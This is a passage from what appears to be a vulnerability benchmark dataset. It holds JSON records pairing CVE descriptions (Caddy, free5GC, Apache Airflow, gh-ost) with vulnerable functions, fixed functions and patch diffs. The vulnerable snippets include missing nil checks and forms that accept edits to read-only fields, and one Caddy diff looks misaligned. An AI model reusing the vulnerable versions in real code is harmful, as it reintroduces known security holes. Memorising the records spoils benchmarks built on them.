nil {\n\t\t\t\tsize = fileInfo.Size()\n\t\t\t}\n\t\t\t// An error most likely means the symlink target doesn't exist,\n\t\t\t// which isn't entirely unusual and shouldn't fail the listing.\n\t\t\t// In this case, just use the size of the symlink itself, which\n\t\t\t// was already set above.\n\t\t}\n\n\t\tfileInfos = append(fileInfos, fileInfo{\n\t\t\tIsDir: isDir,\n\t\t\tIsSymlink: fileIsSymlink,\n\t\t\tName: name,\n\t\t\tSize: size,\n\t\t\tURL: u.String(),\n\t\t\tModTime: f.ModTime().UTC(),\n\t\t\tMode: f.Mode(),\n\t\t})\n\t}\n\tname, _ := url.PathUnescape(urlPath)\n\treturn browseTemplateContext{\n\t\tName: path.Base(name),\n\t\tPath: urlPath,\n\t\tCanGoUp: canGoUp,\n\t\tItems: fileInfos,\n\t\tNumDirs: dirCount,\n\t\tNumFiles: fileCount,\n\t}\n}"}], "fix_func": [{"id": "fix_go_220_1", "commit": "78b5356f2b1945a90de1ef7f2c7669d82098edbd", "file_path": "modules/caddyhttp/caddyhttp.go", "start_line": 17, "end_line": 29, "snippet": "import (\n\t\"bytes\"\n\t\"encoding/json\"\n\t\"io\"\n\t\"net\"\n\t\"net/http\"\n\t\"path/filepath\"\n\t\"strconv\"\n\t\"strings\"\n\n\t\"github.com/caddyserver/caddy/v2\"\n\t\"github.com/caddyserver/caddy/v2/caddyconfig/caddyfile\"\n)"}, {"id": "fix_go_220_2", "commit": "78b5356f2b1945a90de1ef7f2c7669d82098edbd", "file_path": "modules/caddyhttp/caddyhttp.go", "start_line": 249, "end_line": 249, "snippet": "// It should only be used if another listener wrapper must be placed"}, {"id": "fix_go_220_3", "commit": "78b5356f2b1945a90de1ef7f2c7669d82098edbd", "file_path": "modules/caddyhttp/fileserver/browsetplcontext.go", "start_line": 31, "end_line": 89, "snippet": "func (fsrv *FileServer) directoryListing(files []os.FileInfo, canGoUp bool, root, urlPath string, repl *caddy.Replacer) browseTemplateContext {\n\tfilesToHide := fsrv.transformHidePaths(repl)\n\n\tvar dirCount, fileCount int\n\tfileInfos := []fileInfo{}\n\n\tfor _, f := range files {\n\t\tname := f.Name()\n\n\t\tif fileHidden(name, filesToHide) {\n\t\t\tcontinue\n\t\t}\n\n\t\tisDir := f.IsDir() || isSymlinkTargetDir(f, root, urlPath)\n\n\t\t// add the slash after the escape of path to avoid escaping the slash as well\n\t\tif isDir {\n\t\t\tname += \"/\"\n\t\t\tdirCount++\n\t\t} else {\n\t\t\tfileCount++\n\t\t}\n\n\t\tsize := f.Size()\n\t\tfileIsSymlink := isSymlink(f)\n\t\tif fileIsSymlink {\n\t\t\tpath := caddyhttp.SanitizedPathJoin(root, path.Join(urlPath, f.Name()))\n\t\t\tfileInfo, err := os.Stat(path)\n\t\t\tif err == nil {\n\t\t\t\tsize = fileInfo.Size()\n\t\t\t}\n\t\t\t// An error most likely means the symlink target doesn't exist,\n\t\t\t// which isn't entirely unusual and shouldn't fail the listing.\n\t\t\t// In this case, just use the size of the symlink itself, which\n\t\t\t// was already set above.\n\t\t}\n\n\t\tu := url.URL{Path: \"./\" + name} // prepend with \"./\" to fix paths with ':' in the name\n\n\t\tfileInfos = append(fileInfos, fileInfo{\n\t\t\tIsDir: isDir,\n\t\t\tIsSymlink: fileIsSymlink,\n\t\t\tName: name,\n\t\t\tSize: size,\n\t\t\tURL: u.String(),\n\t\t\tModTime: f.ModTime().UTC(),\n\t\t\tMode: f.Mode(),\n\t\t})\n\t}\n\tname, _ := url.PathUnescape(urlPath)\n\treturn browseTemplateContext{\n\t\tName: path.Base(name),\n\t\tPath: urlPath,\n\t\tCanGoUp: canGoUp,\n\t\tItems: fileInfos,\n\t\tNumDirs: dirCount,\n\t\tNumFiles: fileCount,\n\t}\n}"}], "vul_patch": "--- a/modules/caddyhttp/caddyhttp.go\n+++ b/modules/caddyhttp/caddyhttp.go\n@@ -4,7 +4,6 @@\n \t\"io\"\n \t\"net\"\n \t\"net/http\"\n-\t\"net/url\"\n \t\"path/filepath\"\n \t\"strconv\"\n \t\"strings\"\n\n--- 
a/modules/caddyhttp/caddyhttp.go\n+++ b/modules/caddyhttp/caddyhttp.go\n@@ -1,18 +1 @@\n-func SanitizedPathJoin(root, reqPath string) string {\n-\treqPath, _ = url.PathUnescape(reqPath)\n-\tif root == \"\" {\n-\t\troot = \".\"\n-\t}\n-\n-\tpath := filepath.Join(root, filepath.Clean(\"/\"+reqPath))\n-\n-\t// filepath.Join also cleans the path, and cleaning strips\n-\t// the trailing slash, so we need to re-add it afterwards.\n-\t// if the length is 1, then it's a path to the root,\n-\t// and that should return \".\", so we don't append the separator.\n-\tif strings.HasSuffix(reqPath, \"/\") && len(reqPath) > 1 {\n-\t\tpath += separator\n-\t}\n-\n-\treturn path\n-}\n+// It should only be used if another listener wrapper must be placed\n\n--- a/modules/caddyhttp/fileserver/browsetplcontext.go\n+++ b/modules/caddyhttp/fileserver/browsetplcontext.go\n@@ -13,11 +13,9 @@\n \n \t\tisDir := f.IsDir() || isSymlinkTargetDir(f, root, urlPath)\n \n-\t\tu := url.URL{Path: url.PathEscape(name)}\n-\n \t\t// add the slash after the escape of path to avoid escaping the slash as well\n \t\tif isDir {\n-\t\t\tu.Path += \"/\"\n+\t\t\tname += \"/\"\n \t\t\tdirCount++\n \t\t} else {\n \t\t\tfileCount++\n@@ -36,6 +34,8 @@\n \t\t\t// In this case, just use the size of the symlink itself, which\n \t\t\t// was already set above.\n \t\t}\n+\n+\t\tu := url.URL{Path: \"./\" + name} // prepend with \"./\" to fix paths with ':' in the name\n \n \t\tfileInfos = append(fileInfos, fileInfo{\n \t\t\tIsDir: isDir,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-49391", "cve_description": "An issue was discovered in free5GC version 3.3.0, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on AMF component via crafted NGAP message.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/free5gc/amf", "patch_url": ["https://github.com/free5gc/amf/commit/6fc612c35997cf4e8be1e5c86ae2242f04b576a9"], "programing_language": "Go", "vul_func": [{"id": "vul_go_146_1", "commit": "aebc9fc", "file_path": "internal/context/context.go", "start_line": 353, "end_line": 360, "snippet": "func (context *AMFContext) NewAmfRan(conn net.Conn) *AmfRan {\n\tran := AmfRan{}\n\tran.SupportedTAList = make([]SupportedTAI, 0, MaxNumOfTAI*MaxNumOfBroadcastPLMNs)\n\tran.Conn = conn\n\tran.Log = logger.NgapLog.WithField(logger.FieldRanAddr, 
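Note on CVE-2022-28923 above: in the browse listing, each entry's href was built directly from the file name, and a name containing `:` before any `/` parses as a URL scheme rather than a path segment, which is exactly what the patch's `"./" + name` prefix forecloses. The snippet below demonstrates that parsing rule with Python's `urljoin` (the base URL and file names are made up for the demo; this is standard RFC 3986 relative-reference behavior, not Caddy code):

```python
from urllib.parse import urljoin

base = "https://example.test/files/"

# Without the "./" prefix the name is parsed as scheme "evil.com" with
# opaque data "8080", so it never resolves against the base at all:
print(urljoin(base, "evil.com:8080"))     # evil.com:8080
# Prefixing "./" forces path interpretation, as the patch does:
print(urljoin(base, "./evil.com:8080"))   # https://example.test/files/evil.com:8080
```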
conn.RemoteAddr().String())\n\tcontext.AmfRanPool.Store(conn, &ran)\n\treturn &ran\n}"}, {"id": "vul_go_146_2", "commit": "aebc9fc", "file_path": "internal/context/ran_ue.go", "start_line": 125, "end_line": 141, "snippet": "func (ranUe *RanUe) UpdateLogFields() {\n\tif ranUe.Ran != nil && ranUe.Ran.Conn != nil {\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, ranUe.Ran.Conn.RemoteAddr().String())\n\n\t\tanTypeStr := \"\"\n\t\tif ranUe.Ran.AnType == models.AccessType__3_GPP_ACCESS {\n\t\t\tanTypeStr = \"3GPP\"\n\t\t} else if ranUe.Ran.AnType == models.AccessType_NON_3_GPP_ACCESS {\n\t\t\tanTypeStr = \"Non3GPP\"\n\t\t}\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldAmfUeNgapID,\n\t\t\tfmt.Sprintf(\"RU:%d,AU:%d(%s)\", ranUe.RanUeNgapId, ranUe.AmfUeNgapId, anTypeStr))\n\t} else {\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, \"no ran conn\")\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldAmfUeNgapID, \"RU:,AU:\")\n\t}\n}"}, {"id": "vul_go_146_3", "commit": "aebc9fc", "file_path": "internal/ngap/dispatcher.go", "start_line": 13, "end_line": 46, "snippet": "func Dispatch(conn net.Conn, msg []byte) {\n\tvar ran *context.AmfRan\n\tamfSelf := context.GetSelf()\n\n\tran, ok := amfSelf.AmfRanFindByConn(conn)\n\tif !ok {\n\t\tlogger.NgapLog.Infof(\"Create a new NG connection for: %s\", conn.RemoteAddr().String())\n\t\tran = amfSelf.NewAmfRan(conn)\n\t}\n\n\tif len(msg) == 0 {\n\t\tran.Log.Infof(\"RAN close the connection.\")\n\t\tran.Remove()\n\t\treturn\n\t}\n\n\tpdu, err := ngap.Decoder(msg)\n\tif err != nil {\n\t\tran.Log.Errorf(\"NGAP decode error : %+v\", err)\n\t\treturn\n\t}\n\n\tif ran == nil {\n\t\tlogger.NgapLog.Error(\"ran is nil\")\n\t\treturn\n\t}\n\n\tif pdu == nil {\n\t\tran.Log.Error(\"NGAP Message is nil\")\n\t\treturn\n\t}\n\n\tdispatchMain(ran, pdu)\n}"}], "fix_func": [{"id": "fix_go_146_1", "commit": "6fc612c", "file_path": "internal/context/context.go", "start_line": 353, "end_line": 366, "snippet": "func (context *AMFContext) NewAmfRan(conn net.Conn) *AmfRan {\n\tran := AmfRan{}\n\tran.SupportedTAList = make([]SupportedTAI, 0, MaxNumOfTAI*MaxNumOfBroadcastPLMNs)\n\tran.Conn = conn\n\taddr := conn.RemoteAddr()\n\tif addr != nil {\n\t\tran.Log = logger.NgapLog.WithField(logger.FieldRanAddr, addr.String())\n\t} else {\n\t\tran.Log = logger.NgapLog.WithField(logger.FieldRanAddr, \"(nil)\")\n\t}\n\n\tcontext.AmfRanPool.Store(conn, &ran)\n\treturn &ran\n}"}, {"id": "fix_go_146_2", "commit": "6fc612c", "file_path": "internal/context/ran_ue.go", "start_line": 125, "end_line": 146, "snippet": "func (ranUe *RanUe) UpdateLogFields() {\n\tif ranUe.Ran != nil && ranUe.Ran.Conn != nil {\n\t\taddr := ranUe.Ran.Conn.RemoteAddr()\n\t\tif addr != nil {\n\t\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, addr.String())\n\t\t} else {\n\t\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, \"(nil)\")\n\t\t}\n\n\t\tanTypeStr := \"\"\n\t\tif ranUe.Ran.AnType == models.AccessType__3_GPP_ACCESS {\n\t\t\tanTypeStr = \"3GPP\"\n\t\t} else if ranUe.Ran.AnType == models.AccessType_NON_3_GPP_ACCESS {\n\t\t\tanTypeStr = \"Non3GPP\"\n\t\t}\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldAmfUeNgapID,\n\t\t\tfmt.Sprintf(\"RU:%d,AU:%d(%s)\", ranUe.RanUeNgapId, ranUe.AmfUeNgapId, anTypeStr))\n\t} else {\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, \"no ran conn\")\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldAmfUeNgapID, \"RU:,AU:\")\n\t}\n}"}, {"id": "fix_go_146_3", "commit": "6fc612c", "file_path": "internal/ngap/dispatcher.go", "start_line": 13, "end_line": 
51, "snippet": "func Dispatch(conn net.Conn, msg []byte) {\n\tvar ran *context.AmfRan\n\tamfSelf := context.GetSelf()\n\n\tran, ok := amfSelf.AmfRanFindByConn(conn)\n\tif !ok {\n\t\taddr := conn.RemoteAddr()\n\t\tif addr == nil {\n\t\t\tlogger.NgapLog.Warn(\"Addr of new NG connection is nii\")\n\t\t\treturn\n\t\t}\n\t\tlogger.NgapLog.Infof(\"Create a new NG connection for: %s\", addr.String())\n\t\tran = amfSelf.NewAmfRan(conn)\n\t}\n\n\tif len(msg) == 0 {\n\t\tran.Log.Infof(\"RAN close the connection.\")\n\t\tran.Remove()\n\t\treturn\n\t}\n\n\tpdu, err := ngap.Decoder(msg)\n\tif err != nil {\n\t\tran.Log.Errorf(\"NGAP decode error : %+v\", err)\n\t\treturn\n\t}\n\n\tif ran == nil {\n\t\tlogger.NgapLog.Error(\"ran is nil\")\n\t\treturn\n\t}\n\n\tif pdu == nil {\n\t\tran.Log.Error(\"NGAP Message is nil\")\n\t\treturn\n\t}\n\n\tdispatchMain(ran, pdu)\n}"}], "vul_patch": "--- a/internal/context/context.go\n+++ b/internal/context/context.go\n@@ -2,7 +2,13 @@\n \tran := AmfRan{}\n \tran.SupportedTAList = make([]SupportedTAI, 0, MaxNumOfTAI*MaxNumOfBroadcastPLMNs)\n \tran.Conn = conn\n-\tran.Log = logger.NgapLog.WithField(logger.FieldRanAddr, conn.RemoteAddr().String())\n+\taddr := conn.RemoteAddr()\n+\tif addr != nil {\n+\t\tran.Log = logger.NgapLog.WithField(logger.FieldRanAddr, addr.String())\n+\t} else {\n+\t\tran.Log = logger.NgapLog.WithField(logger.FieldRanAddr, \"(nil)\")\n+\t}\n+\n \tcontext.AmfRanPool.Store(conn, &ran)\n \treturn &ran\n }\n\n--- a/internal/context/ran_ue.go\n+++ b/internal/context/ran_ue.go\n@@ -1,6 +1,11 @@\n func (ranUe *RanUe) UpdateLogFields() {\n \tif ranUe.Ran != nil && ranUe.Ran.Conn != nil {\n-\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, ranUe.Ran.Conn.RemoteAddr().String())\n+\t\taddr := ranUe.Ran.Conn.RemoteAddr()\n+\t\tif addr != nil {\n+\t\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, addr.String())\n+\t\t} else {\n+\t\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, \"(nil)\")\n+\t\t}\n \n \t\tanTypeStr := \"\"\n \t\tif ranUe.Ran.AnType == models.AccessType__3_GPP_ACCESS {\n\n--- a/internal/ngap/dispatcher.go\n+++ b/internal/ngap/dispatcher.go\n@@ -4,7 +4,12 @@\n \n \tran, ok := amfSelf.AmfRanFindByConn(conn)\n \tif !ok {\n-\t\tlogger.NgapLog.Infof(\"Create a new NG connection for: %s\", conn.RemoteAddr().String())\n+\t\taddr := conn.RemoteAddr()\n+\t\tif addr == nil {\n+\t\t\tlogger.NgapLog.Warn(\"Addr of new NG connection is nii\")\n+\t\t\treturn\n+\t\t}\n+\t\tlogger.NgapLog.Infof(\"Create a new NG connection for: %s\", addr.String())\n \t\tran = amfSelf.NewAmfRan(conn)\n \t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-47037", "cve_description": "We failed to apply\u00a0CVE-2023-40611 in 2.7.1 and this vulnerability was marked as fixed then.\u00a0\n\nApache Airflow, versions before 2.7.3, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. 
This could have them alter details such as configuration parameters, start date, etc.\u00a0\n\nUsers should upgrade to version 2.7.3 or later which has removed the vulnerability.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/apache/airflow", "patch_url": ["https://github.com/apache/airflow/commit/2a0106e4edf67c5905ebfcb82a6008662ae0f7ad", "https://github.com/apache/airflow/commit/b7a46c970d638028a4a7643ad000dcee951fb9ef"], "programing_language": "Python", "vul_func": [{"id": "vul_py_259_1", "commit": "a2b0a6a", "file_path": "airflow/www/forms.py", "start_line": 121, "end_line": 144, "snippet": "class DagRunEditForm(DynamicForm):\n \"\"\"Form for editing DAG Run.\n\n We don't actually want to allow editing, so everything is read-only here.\n \"\"\"\n\n dag_id = StringField(lazy_gettext(\"Dag Id\"), widget=BS3TextFieldROWidget())\n start_date = DateTimeWithTimezoneField(lazy_gettext(\"Start Date\"), widget=AirflowDateTimePickerROWidget())\n end_date = DateTimeWithTimezoneField(lazy_gettext(\"End Date\"), widget=AirflowDateTimePickerROWidget())\n run_id = StringField(lazy_gettext(\"Run Id\"), widget=BS3TextFieldROWidget())\n state = StringField(lazy_gettext(\"State\"), widget=BS3TextFieldROWidget())\n execution_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Logical Date\"),\n widget=AirflowDateTimePickerROWidget(),\n )\n conf = TextAreaField(lazy_gettext(\"Conf\"), widget=BS3TextAreaROWidget())\n note = TextAreaField(lazy_gettext(\"User Note\"), widget=BS3TextAreaFieldWidget())\n\n def populate_obj(self, item):\n \"\"\"Populates the attributes of the passed obj with data from the form's fields.\"\"\"\n super().populate_obj(item)\n item.run_type = DagRunType.from_run_id(item.run_id)\n if item.conf:\n item.conf = json.loads(item.conf)"}, {"id": "vul_py_259_2", "commit": "a2b0a6a", "file_path": "airflow/www/forms.py", "start_line": 147, "end_line": 172, "snippet": "class TaskInstanceEditForm(DynamicForm):\n \"\"\"Form for editing TaskInstance.\"\"\"\n\n dag_id = StringField(lazy_gettext(\"Dag Id\"), validators=[InputRequired()], widget=BS3TextFieldROWidget())\n task_id = StringField(\n lazy_gettext(\"Task Id\"), validators=[InputRequired()], widget=BS3TextFieldROWidget()\n )\n start_date = DateTimeWithTimezoneField(lazy_gettext(\"Start Date\"), widget=AirflowDateTimePickerROWidget())\n end_date = DateTimeWithTimezoneField(lazy_gettext(\"End Date\"), widget=AirflowDateTimePickerROWidget())\n state = SelectField(\n lazy_gettext(\"State\"),\n choices=(\n (\"success\", \"success\"),\n (\"running\", \"running\"),\n (\"failed\", \"failed\"),\n (\"up_for_retry\", \"up_for_retry\"),\n ),\n widget=Select2Widget(),\n validators=[InputRequired()],\n )\n execution_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Logical Date\"),\n widget=AirflowDateTimePickerROWidget(),\n validators=[InputRequired()],\n )\n note = 
TextAreaField(lazy_gettext(\"User Note\"), widget=BS3TextAreaFieldWidget())"}], "fix_func": [{"id": "fix_py_259_1", "commit": "2a0106e", "file_path": "airflow/www/forms.py", "start_line": 121, "end_line": 151, "snippet": "class DagRunEditForm(DynamicForm):\n \"\"\"Form for editing DAG Run.\n\n Only note field is editable, so everything else is read-only here.\n \"\"\"\n\n dag_id = StringField(lazy_gettext(\"Dag Id\"), validators=[ReadOnly()], widget=BS3TextFieldROWidget())\n start_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Start Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n )\n end_date = DateTimeWithTimezoneField(\n lazy_gettext(\"End Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n )\n run_id = StringField(lazy_gettext(\"Run Id\"), validators=[ReadOnly()], widget=BS3TextFieldROWidget())\n state = StringField(lazy_gettext(\"State\"), validators=[ReadOnly()], widget=BS3TextFieldROWidget())\n execution_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Logical Date\"),\n validators=[ReadOnly()],\n widget=AirflowDateTimePickerROWidget(),\n )\n conf = TextAreaField(lazy_gettext(\"Conf\"), validators=[ReadOnly()], widget=BS3TextAreaROWidget())\n note = TextAreaField(lazy_gettext(\"User Note\"), widget=BS3TextAreaFieldWidget())\n\n def populate_obj(self, item):\n \"\"\"Populates the attributes of the passed obj with data from the form's not-read-only fields.\"\"\"\n for name, field in self._fields.items():\n if not field.flags.readonly:\n field.populate_obj(item, name)\n item.run_type = DagRunType.from_run_id(item.run_id)\n if item.conf:\n item.conf = json.loads(item.conf)"}, {"id": "fix_py_259_2", "commit": "2a0106e", "file_path": "airflow/www/forms.py", "start_line": 154, "end_line": 194, "snippet": "class TaskInstanceEditForm(DynamicForm):\n \"\"\"Form for editing TaskInstance.\n\n Only note and state fields are editable, so everything else is read-only here.\n \"\"\"\n\n dag_id = StringField(\n lazy_gettext(\"Dag Id\"), validators=[InputRequired(), ReadOnly()], widget=BS3TextFieldROWidget()\n )\n task_id = StringField(\n lazy_gettext(\"Task Id\"), validators=[InputRequired(), ReadOnly()], widget=BS3TextFieldROWidget()\n )\n start_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Start Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n )\n end_date = DateTimeWithTimezoneField(\n lazy_gettext(\"End Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n )\n state = SelectField(\n lazy_gettext(\"State\"),\n choices=(\n (\"success\", \"success\"),\n (\"running\", \"running\"),\n (\"failed\", \"failed\"),\n (\"up_for_retry\", \"up_for_retry\"),\n ),\n widget=Select2Widget(),\n validators=[InputRequired()],\n )\n execution_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Logical Date\"),\n widget=AirflowDateTimePickerROWidget(),\n validators=[InputRequired(), ReadOnly()],\n )\n note = TextAreaField(lazy_gettext(\"User Note\"), widget=BS3TextAreaFieldWidget())\n\n def populate_obj(self, item):\n \"\"\"Populates the attributes of the passed obj with data from the form's not-read-only fields.\"\"\"\n for name, field in self._fields.items():\n if not field.flags.readonly:\n field.populate_obj(item, name)"}, {"id": "fix_py_259_3", "commit": "2a0106e", "file_path": "airflow/www/validators.py", "start_line": 102, "end_line": 110, "snippet": "class ReadOnly:\n \"\"\"Adds readonly flag to a field.\n\n When using this you normally will need to override the form's populate_obj method,\n so 
field.populate_obj is not called for read-only fields.\n \"\"\"\n\n def __call__(self, form, field):\n field.flags.readonly = True"}], "vul_patch": "--- a/airflow/www/forms.py\n+++ b/airflow/www/forms.py\n@@ -1,24 +1,31 @@\n class DagRunEditForm(DynamicForm):\n \"\"\"Form for editing DAG Run.\n \n- We don't actually want to allow editing, so everything is read-only here.\n+ Only note field is editable, so everything else is read-only here.\n \"\"\"\n \n- dag_id = StringField(lazy_gettext(\"Dag Id\"), widget=BS3TextFieldROWidget())\n- start_date = DateTimeWithTimezoneField(lazy_gettext(\"Start Date\"), widget=AirflowDateTimePickerROWidget())\n- end_date = DateTimeWithTimezoneField(lazy_gettext(\"End Date\"), widget=AirflowDateTimePickerROWidget())\n- run_id = StringField(lazy_gettext(\"Run Id\"), widget=BS3TextFieldROWidget())\n- state = StringField(lazy_gettext(\"State\"), widget=BS3TextFieldROWidget())\n+ dag_id = StringField(lazy_gettext(\"Dag Id\"), validators=[ReadOnly()], widget=BS3TextFieldROWidget())\n+ start_date = DateTimeWithTimezoneField(\n+ lazy_gettext(\"Start Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n+ )\n+ end_date = DateTimeWithTimezoneField(\n+ lazy_gettext(\"End Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n+ )\n+ run_id = StringField(lazy_gettext(\"Run Id\"), validators=[ReadOnly()], widget=BS3TextFieldROWidget())\n+ state = StringField(lazy_gettext(\"State\"), validators=[ReadOnly()], widget=BS3TextFieldROWidget())\n execution_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Logical Date\"),\n+ validators=[ReadOnly()],\n widget=AirflowDateTimePickerROWidget(),\n )\n- conf = TextAreaField(lazy_gettext(\"Conf\"), widget=BS3TextAreaROWidget())\n+ conf = TextAreaField(lazy_gettext(\"Conf\"), validators=[ReadOnly()], widget=BS3TextAreaROWidget())\n note = TextAreaField(lazy_gettext(\"User Note\"), widget=BS3TextAreaFieldWidget())\n \n def populate_obj(self, item):\n- \"\"\"Populates the attributes of the passed obj with data from the form's fields.\"\"\"\n- super().populate_obj(item)\n+ \"\"\"Populates the attributes of the passed obj with data from the form's not-read-only fields.\"\"\"\n+ for name, field in self._fields.items():\n+ if not field.flags.readonly:\n+ field.populate_obj(item, name)\n item.run_type = DagRunType.from_run_id(item.run_id)\n if item.conf:\n item.conf = json.loads(item.conf)\n\n--- a/airflow/www/forms.py\n+++ b/airflow/www/forms.py\n@@ -1,12 +1,21 @@\n class TaskInstanceEditForm(DynamicForm):\n- \"\"\"Form for editing TaskInstance.\"\"\"\n+ \"\"\"Form for editing TaskInstance.\n \n- dag_id = StringField(lazy_gettext(\"Dag Id\"), validators=[InputRequired()], widget=BS3TextFieldROWidget())\n+ Only note and state fields are editable, so everything else is read-only here.\n+ \"\"\"\n+\n+ dag_id = StringField(\n+ lazy_gettext(\"Dag Id\"), validators=[InputRequired(), ReadOnly()], widget=BS3TextFieldROWidget()\n+ )\n task_id = StringField(\n- lazy_gettext(\"Task Id\"), validators=[InputRequired()], widget=BS3TextFieldROWidget()\n+ lazy_gettext(\"Task Id\"), validators=[InputRequired(), ReadOnly()], widget=BS3TextFieldROWidget()\n )\n- start_date = DateTimeWithTimezoneField(lazy_gettext(\"Start Date\"), widget=AirflowDateTimePickerROWidget())\n- end_date = DateTimeWithTimezoneField(lazy_gettext(\"End Date\"), widget=AirflowDateTimePickerROWidget())\n+ start_date = DateTimeWithTimezoneField(\n+ lazy_gettext(\"Start Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n+ )\n+ 
end_date = DateTimeWithTimezoneField(\n+ lazy_gettext(\"End Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n+ )\n state = SelectField(\n lazy_gettext(\"State\"),\n choices=(\n@@ -21,6 +30,12 @@\n execution_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Logical Date\"),\n widget=AirflowDateTimePickerROWidget(),\n- validators=[InputRequired()],\n+ validators=[InputRequired(), ReadOnly()],\n )\n note = TextAreaField(lazy_gettext(\"User Note\"), widget=BS3TextAreaFieldWidget())\n+\n+ def populate_obj(self, item):\n+ \"\"\"Populates the attributes of the passed obj with data from the form's not-read-only fields.\"\"\"\n+ for name, field in self._fields.items():\n+ if not field.flags.readonly:\n+ field.populate_obj(item, name)\n\n--- /dev/null\n+++ b/airflow/www/forms.py\n@@ -0,0 +1,9 @@\n+class ReadOnly:\n+ \"\"\"Adds readonly flag to a field.\n+\n+ When using this you normally will need to override the form's populate_obj method,\n+ so field.populate_obj is not called for read-only fields.\n+ \"\"\"\n+\n+ def __call__(self, form, field):\n+ field.flags.readonly = True\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-21687", "cve_description": "gh-ost is a triggerless online schema migration solution for MySQL. Versions prior to 1.1.3 are subject to an arbitrary file read vulnerability. The attacker must have access to the target host or trick an administrator into executing a malicious gh-ost command on a host running gh-ost, plus network access from host running gh-ost to the attack's malicious MySQL server. The `-database` parameter does not properly sanitize user input which can lead to arbitrary file reads.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/github/gh-ost", "patch_url": ["https://github.com/github/gh-ost/commit/a91ab042de013cfd8fbb633763438932d9080d8f"], "programing_language": "Go", "vul_func": [{"id": "vul_go_183_1", "commit": "1460aa1", "file_path": "go/cmd/gh-ost/main.go", "start_line": 47, "end_line": 300, "snippet": "func main() {\n\tmigrationContext := base.NewMigrationContext()\n\tflag.StringVar(&migrationContext.InspectorConnectionConfig.Key.Hostname, \"host\", \"127.0.0.1\", \"MySQL hostname (preferably a replica, not the master)\")\n\tflag.StringVar(&migrationContext.AssumeMasterHostname, \"assume-master-host\", \"\", \"(optional) explicitly tell gh-ost the identity of the master. Format: some.host.com[:port] This is useful in master-master setups where you wish to pick an explicit master, or in a tungsten-replicator where gh-ost is unable to determine the master\")\n\tflag.IntVar(&migrationContext.InspectorConnectionConfig.Key.Port, \"port\", 3306, \"MySQL port (preferably a replica, not the master)\")\n\tflag.Float64Var(&migrationContext.InspectorConnectionConfig.Timeout, \"mysql-timeout\", 0.0, \"Connect, read and write timeout for MySQL\")\n\tflag.StringVar(&migrationContext.CliUser, \"user\", \"\", \"MySQL user\")\n\tflag.StringVar(&migrationContext.CliPassword, \"password\", \"\", \"MySQL password\")\n\tflag.StringVar(&migrationContext.CliMasterUser, \"master-user\", \"\", \"MySQL user on master, if different from that on replica. 
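Note on CVE-2023-47037 above: the read-only widgets (`BS3TextFieldROWidget` and friends) only disabled editing in the browser, while `populate_obj` still wrote back whatever was POSTed, so an authenticated user could tamper with `conf`, `start_date`, and the rest; the fix adds a `ReadOnly` validator that sets `field.flags.readonly` and overrides `populate_obj` to skip flagged fields. A dependency-free sketch of that server-side enforcement (the mini form classes below are illustrative stand-ins, not Flask-AppBuilder's):

```python
class ReadOnly:
    """Validator-style marker that flags a field as read-only."""
    def __call__(self, field):
        field.flags["readonly"] = True

class Field:
    def __init__(self, name, *validators):
        self.name, self.flags, self.data = name, {}, None
        for validator in validators:
            validator(self)
    def populate_obj(self, obj):
        setattr(obj, self.name, self.data)

class Form:
    def __init__(self, *fields):
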